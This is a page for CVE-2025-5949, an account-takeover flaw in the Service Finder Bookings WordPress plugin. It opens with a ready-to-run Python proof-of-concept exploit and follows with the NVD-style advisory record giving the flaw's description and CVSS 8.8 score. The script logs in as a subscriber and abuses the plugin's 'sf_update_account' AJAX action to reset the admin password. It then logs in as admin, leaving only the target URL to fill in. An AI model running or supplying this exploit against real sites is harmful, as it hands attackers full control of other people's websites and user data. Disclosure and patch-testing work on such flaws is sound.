CVE-2025-5949

import requests # CVE-2025-5949 PoC - Service Finder Bookings Plugin Account Takeover # Target: WordPress site with Service Finder Bookings plugin <= 6.0 TARGET_URL = "https://vulnerable-site.com" ATTACKER_USERNAME = "attacker" ATTACKER_PASSWORD = "attacker_password" TARGET_USERNAME = "admin" # Target can be any user including admin NEW_PASSWORD = "Pwned123!" session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": ATTACKER_USERNAME, "pwd": ATTACKER_PASSWORD, "wp-submit": "Log In" } resp = session.post(login_url, data=login_data) print(f"Login status: {resp.status_code}") # Step 2: Exploit password change vulnerability # The plugin does not properly validate user identity before password change change_password_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" exploit_data = { "action": "sf_update_account", "user_id": TARGET_USERNAME, # Target user ID "new_password": NEW_PASSWORD, "confirm_password": NEW_PASSWORD } resp = session.post(change_password_url, data=exploit_data) print(f"Exploit status: {resp.status_code}") print(f"Response: {resp.text}") # Step 3: Login with new password target_login = f"{TARGET_URL}/wp-login.php" target_data = { "log": TARGET_USERNAME, "pwd": NEW_PASSWORD } resp = session.post(target_login, data=target_data) print(f"Account takeover: {'Success' if 'logged-in' in resp.text else 'Failed'}")

{"cve": {"id": "CVE-2025-5949", "sourceIdentifier": "[email protected]", "published": "2025-11-01T05:16:02.763", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's identity prior to processing a password change request. This makes it possible for authenticated attackers with subscriber access or higher to reset other users' passwords, including those of admins."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2874a5f-71f4-4bcd-87e8-a20bb19a5847?source=cve", "source": "[email protected]"}]}}